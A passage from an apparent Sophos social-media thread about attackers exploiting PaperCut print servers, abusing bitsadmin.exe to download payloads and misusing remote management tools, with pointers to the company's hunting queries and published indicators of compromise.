Upon receiving updated threat intelligence, #SophosMDR threat hunters immediately started searching across our customer base for any additional impacted users. The blog post includes SQL queries that Sophos #XDR customers can use (in their Sophos Central console) to identify any suspicious activity.

It's also possible for non-Sophos customers to convert these queries into a #Sigma rule.

One caveat: we observed that a common false positive process activity was the #PaperCut print archive function. But if you identify suspicious activity on a PaperCut server, it's valuable to isolate the machine while you continue to investigate.

We will continue to track these and other threat actors abusing this platform and will update our blog (https://news.sophos.com/en-us/2023/04/27/increased-exploitation-of-papercut-drawing-blood-around-the-internet/) (and the indicators of compromise published on Github at https://github.com/sophoslabs/IoCs/blob/master/papercut-nday-indicators-of-compromise.csv) as needed.

6/6

The #SophosMDR team also discovered cases where threat actors targeting #PaperCut were abusing the bitsadmin.exe Windows application to download payloads. #BITSAdmin is commonly abused by active adversaries as a "living off the land binary" or #LOLbin, handy for accomplishing the task of downloading payloads.

The tools exploited in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of #AnyDesk, #Atera, #Synchro, #TightVNC, #NetSupport, and #DWAgent remote management tools across multiple campaigns.

4/6